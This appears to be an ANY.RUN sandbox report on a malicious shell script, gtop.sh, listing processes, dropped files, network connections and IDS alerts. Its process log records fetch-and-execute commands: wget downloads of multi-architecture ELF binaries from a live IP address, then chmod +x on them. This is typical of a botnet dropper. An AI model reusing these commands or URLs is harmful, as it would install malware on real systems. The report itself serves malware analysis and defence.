File name: gtop.sh

Full analysis: https://app.any.run/tasks/988f9ab0-24e4-4362-a6de-f1ccf42b6598
Verdict: Malicious activity
Analysis date: May 16, 2025, 17:18:43
OS: Ubuntu 22.04.2
MIME: text/plain
File info: ASCII text
MD5: F87BB1B77B61EB73EFB6E6F6B69085AC
SHA1: 223A688C3D0ED01DBC67D3F8B3D2B66984BBB184
SHA256: 8BBA5E64590D99831D4B6DE979370287111C9DA5068F93FB41BB632C9C4A4111
SSDEEP: 48:lTiLTfLTLlTEhbIhDTnh3T8bCBETfchtNTrWJXdTXCsTiLTfLTLlTEhbTghDTnhc:FOZWWB0cPQaZWWB0cPMaZWWBgcPW

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Application was dropped or rewritten from another process

      • jackmyx86 (PID: 41083)
      • jackmyx86 (PID: 41049)
      • jackmyx86 (PID: 41051)
      • jackmyx86 (PID: 41050)
      • jackmyx86 (PID: 41084)
      • jackmyx86 (PID: 41085)
      • jackmyi686 (PID: 41055)
      • jackmyi586 (PID: 41065)
      • jackmyi586 (PID: 41101)
      • jackmyi586 (PID: 41066)
      • jackmyi586 (PID: 41103)
      • jackmyi586 (PID: 41102)
      • jackmyi686 (PID: 41057)
      • jackmyi586 (PID: 41064)
      • jackmyi686 (PID: 41119)
      • jackmyi686 (PID: 41120)
      • jackmyi686 (PID: 41121)
      • jackmyi686 (PID: 41094)
      • jackmyi686 (PID: 41092)
      • jackmyi686 (PID: 41056)
      • jackmyi686 (PID: 41093)
  • SUSPICIOUS

    • Executes commands using command-line interpreter

      • sudo (PID: 41032)
      • bash (PID: 41033)
    • Modifies file or directory owner

      • sudo (PID: 41029)
    • Reads network configuration

      • bash (PID: 41033)
    • Gets active network interfaces

      • bash (PID: 41033)
    • Uses wget to download content

      • bash (PID: 41033)
    • Potential Corporate Privacy Violation

      • wget (PID: 41039)
      • wget (PID: 41069)
      • wget (PID: 41043)
      • wget (PID: 41035)
      • wget (PID: 41058)
      • wget (PID: 41077)
      • wget (PID: 41081)
      • wget (PID: 41062)
      • wget (PID: 41073)
      • wget (PID: 41047)
      • wget (PID: 41090)
      • wget (PID: 41053)
      • wget (PID: 41095)
      • wget (PID: 41113)
      • wget (PID: 41108)
      • wget (PID: 41117)
      • wget (PID: 41086)
      • wget (PID: 41099)
      • wget (PID: 41122)
    • Connects to the server without a host name

      • wget (PID: 41081)
      • wget (PID: 41077)
      • wget (PID: 41086)
      • wget (PID: 41122)
      • wget (PID: 41127)
      • wget (PID: 41128)
      • wget (PID: 41113)
      • wget (PID: 41117)
  • INFO

    • Checks timezone

      • wget (PID: 41039)
      • wget (PID: 41035)
      • wget (PID: 41043)
      • wget (PID: 41047)
      • wget (PID: 41053)
      • wget (PID: 41058)
      • wget (PID: 41062)
      • wget (PID: 41068)
      • wget (PID: 41073)
      • wget (PID: 41069)
      • wget (PID: 41077)
      • wget (PID: 41095)
      • wget (PID: 41081)
      • wget (PID: 41086)
      • wget (PID: 41090)
      • wget (PID: 41099)
      • wget (PID: 41067)
      • wget (PID: 41113)
      • wget (PID: 41117)
      • wget (PID: 41104)
      • wget (PID: 41105)
      • wget (PID: 41108)
      • wget (PID: 41127)
      • wget (PID: 41128)
      • wget (PID: 41122)
    • Creates file in the temporary folder

      • wget (PID: 41035)
      • wget (PID: 41039)
      • wget (PID: 41043)
      • wget (PID: 41047)
      • wget (PID: 41053)
      • wget (PID: 41058)
      • wget (PID: 41062)
      • wget (PID: 41081)
      • wget (PID: 41069)
      • wget (PID: 41073)
      • wget (PID: 41077)
      • wget (PID: 41086)
      • wget (PID: 41090)
      • wget (PID: 41095)
      • wget (PID: 41099)
      • wget (PID: 41108)
      • wget (PID: 41113)
      • wget (PID: 41117)
      • wget (PID: 41122)
No Malware configuration.
Total processes: 220
Monitored processes: 89
Malicious processes: 2
Suspicious processes: 6

Behavior graph

[Interactive process graph; nodes shown: dash, sudo, chown, chmod, bash, locale-check, wget, jackmyx86, jackmyi686, jackmyi586]

Process information

PID: 41028
CMD: /bin/sh -c "sudo chown user /tmp/gtop\.sh && chmod +x /tmp/gtop\.sh && DISPLAY=:0 sudo -iu user /tmp/gtop\.sh "
Path: /usr/bin/dash
Parent process: IntiFjKCklFyPMJr
User: root
Integrity Level: UNKNOWN
Exit code: 2048
Modules (Images):
  • /usr/lib/x86_64-linux-gnu/libc.so.6

PID: 41029
CMD: sudo chown user /tmp/gtop.sh
Path: /usr/bin/sudo
Parent process: dash
User: root
Integrity Level: UNKNOWN
Exit code: 0
Modules (Images):
  • /usr/lib/x86_64-linux-gnu/libaudit.so.1.0.0
  • /usr/lib/x86_64-linux-gnu/libselinux.so.1
  • /usr/libexec/sudo/libsudo_util.so.0.0.0
  • /usr/lib/x86_64-linux-gnu/libc.so.6
  • /usr/lib/x86_64-linux-gnu/libcap-ng.so.0.0.0
  • /usr/lib/x86_64-linux-gnu/libpcre2-8.so.0.10.4
  • /usr/lib/x86_64-linux-gnu/libnss_systemd.so.2
  • /usr/libexec/sudo/sudoers.so
  • /usr/lib/x86_64-linux-gnu/libpam.so.0.85.1
  • /usr/lib/x86_64-linux-gnu/libz.so.1.2.11

PID: 41030
CMD: chown user /tmp/gtop.sh
Path: /usr/bin/chown
Parent process: sudo
User: root
Integrity Level: UNKNOWN
Exit code: 0
Modules (Images):
  • /usr/lib/x86_64-linux-gnu/libc.so.6

PID: 41031
CMD: chmod +x /tmp/gtop.sh
Path: /usr/bin/chmod
Parent process: dash
User: root
Integrity Level: UNKNOWN
Exit code: 0
Modules (Images):
  • /usr/lib/x86_64-linux-gnu/libc.so.6

PID: 41032
CMD: sudo -iu user /tmp/gtop.sh
Path: /usr/bin/sudo
Parent process: dash
User: root
Integrity Level: UNKNOWN
Exit code: 2048
Modules (Images):
  • /usr/lib/x86_64-linux-gnu/libaudit.so.1.0.0
  • /usr/lib/x86_64-linux-gnu/libselinux.so.1
  • /usr/libexec/sudo/libsudo_util.so.0.0.0
  • /usr/lib/x86_64-linux-gnu/libc.so.6
  • /usr/lib/x86_64-linux-gnu/libcap-ng.so.0.0.0
  • /usr/lib/x86_64-linux-gnu/libpcre2-8.so.0.10.4
  • /usr/lib/x86_64-linux-gnu/libnss_systemd.so.2
  • /usr/libexec/sudo/sudoers.so
  • /usr/lib/x86_64-linux-gnu/libpam.so.0.85.1
  • /usr/lib/x86_64-linux-gnu/libz.so.1.2.11

PID: 41033
CMD: -bash --login -c \/tmp\/gtop\.sh
Path: /usr/bin/bash
Parent process: sudo
User: user
Integrity Level: UNKNOWN
Exit code: 2048
Modules (Images):
  • /usr/lib/x86_64-linux-gnu/libtinfo.so.6.3
  • /usr/lib/x86_64-linux-gnu/libc.so.6

PID: 41034
CMD: /usr/bin/locale-check C.UTF-8
Path: /usr/bin/locale-check
Parent process: bash
User: user
Integrity Level: UNKNOWN
Exit code: 0
Modules (Images):
  • /usr/lib/x86_64-linux-gnu/libc.so.6

PID: 41035
CMD: wget -q http://176.65.148.190/jackmymipsel
Path: /usr/bin/wget
Parent process: bash
User: user
Integrity Level: UNKNOWN
Exit code: 0
Modules (Images):
  • /usr/lib/x86_64-linux-gnu/libpcre2-8.so.0.10.4
  • /usr/lib/x86_64-linux-gnu/libuuid.so.1.3.0
  • /usr/lib/x86_64-linux-gnu/libidn2.so.0.3.7
  • /usr/lib/x86_64-linux-gnu/libssl.so.3
  • /usr/lib/x86_64-linux-gnu/libcrypto.so.3
  • /usr/lib/x86_64-linux-gnu/libz.so.1.2.11
  • /usr/lib/x86_64-linux-gnu/libpsl.so.5.3.2
  • /usr/lib/x86_64-linux-gnu/libc.so.6
  • /usr/lib/x86_64-linux-gnu/libunistring.so.2.2.0

PID: 41036
CMD: chmod +x jackmymipsel
Path: /usr/bin/chmod
Parent process: bash
User: user
Integrity Level: UNKNOWN
Exit code: 0
Modules (Images):
  • /usr/lib/x86_64-linux-gnu/libc.so.6

PID: 41037
CMD: -bash --login -c \/tmp\/gtop\.sh
Path: /usr/bin/bash
Parent process: bash
User: user
Integrity Level: UNKNOWN
Exit code: 32256
Executable files: 0
Suspicious files: 18
Text files: 0
Unknown types: 1

Dropped files

PID | Process | Filename | Type
41035 | wget | /tmp/jackmymipsel | o
41039 | wget | /tmp/jackmymips | binary
41043 | wget | /tmp/jackmysh4 | o
41047 | wget | /tmp/jackmyx86 | binary
41053 | wget | /tmp/jackmyi686 | o
41058 | wget | /tmp/jackmypowerpc | o
41062 | wget | /tmp/jackmyi586 | binary
41069 | wget | /tmp/jackmymipsel.1 | binary
41073 | wget | /tmp/jackmymips.1 | binary
41077 | wget | /tmp/jackmysh4.1 | binary
HTTP(S) requests: 26
TCP/UDP connections: 203
DNS requests: 11
Threats: 19

HTTP requests

PID | Process | Method | HTTP Code | IP | URL | CN | Reputation
- | - | GET | 204 | 185.125.190.97:80 | http://connectivity-check.ubuntu.com/ | unknown | whitelisted
41035 | wget | GET | 200 | 176.65.148.190:80 | http://176.65.148.190/jackmymipsel | unknown | unknown
41039 | wget | GET | 200 | 176.65.148.190:80 | http://176.65.148.190/jackmymips | unknown | malicious
41043 | wget | GET | 200 | 176.65.148.190:80 | http://176.65.148.190/jackmysh4 | unknown | unknown
41053 | wget | GET | 200 | 176.65.148.190:80 | http://176.65.148.190/jackmyi686 | unknown | unknown
41047 | wget | GET | 200 | 176.65.148.190:80 | http://176.65.148.190/jackmyx86 | unknown | unknown
41058 | wget | GET | 200 | 176.65.148.190:80 | http://176.65.148.190/jackmypowerpc | unknown | unknown
41062 | wget | GET | 200 | 176.65.148.190:80 | http://176.65.148.190/jackmyi586 | unknown | unknown
41068 | wget | GET | 404 | 176.65.148.190:80 | http://176.65.148.190/jackmysparc | unknown | unknown
41067 | wget | GET | 404 | 176.65.148.190:80 | http://176.65.148.190/jackmym86k | unknown | malicious

Connections

PID | Process | IP | Domain | ASN | CN | Reputation
484 | avahi-daemon | 224.0.0.251:5353 | - | - | - | unknown
- | - | 185.125.190.96:80 | connectivity-check.ubuntu.com | Canonical Group Limited | GB | whitelisted
- | - | 185.125.190.97:80 | connectivity-check.ubuntu.com | Canonical Group Limited | GB | whitelisted
- | - | 169.150.255.183:443 | odrs.gnome.org | - | GB | whitelisted
- | - | 185.125.188.57:443 | api.snapcraft.io | Canonical Group Limited | GB | whitelisted
- | - | 185.125.188.59:443 | api.snapcraft.io | Canonical Group Limited | GB | whitelisted
41035 | wget | 176.65.148.190:80 | - | - | DE | unknown
41039 | wget | 176.65.148.190:80 | - | - | DE | unknown
41043 | wget | 176.65.148.190:80 | - | - | DE | unknown
41047 | wget | 176.65.148.190:80 | - | - | DE | unknown

DNS requests

Domain | IP | Reputation
google.com | 142.250.186.142, 2a00:1450:4001:82a::200e | whitelisted
connectivity-check.ubuntu.com | whitelisted
odrs.gnome.org | whitelisted
api.snapcraft.io | whitelisted
4.100.168.192.in-addr.arpa | unknown

Threats

PID | Process | Class | Message
41035 | wget | Potential Corporate Privacy Violation | ET INFO Executable and linking format (ELF) file download Over HTTP
41039 | wget | Potential Corporate Privacy Violation | ET INFO Executable and linking format (ELF) file download Over HTTP
41043 | wget | Potential Corporate Privacy Violation | ET INFO Executable and linking format (ELF) file download Over HTTP
41047 | wget | Potential Corporate Privacy Violation | ET INFO Executable and linking format (ELF) file download Over HTTP
41053 | wget | Potential Corporate Privacy Violation | ET INFO Executable and linking format (ELF) file download Over HTTP
41058 | wget | Potential Corporate Privacy Violation | ET INFO Executable and linking format (ELF) file download Over HTTP
41062 | wget | Potential Corporate Privacy Violation | ET INFO Executable and linking format (ELF) file download Over HTTP
41069 | wget | Potential Corporate Privacy Violation | ET INFO Executable and linking format (ELF) file download Over HTTP
41073 | wget | Potential Corporate Privacy Violation | ET INFO Executable and linking format (ELF) file download Over HTTP
41077 | wget | Potential Corporate Privacy Violation | ET INFO Executable and linking format (ELF) file download Over HTTP
No debug info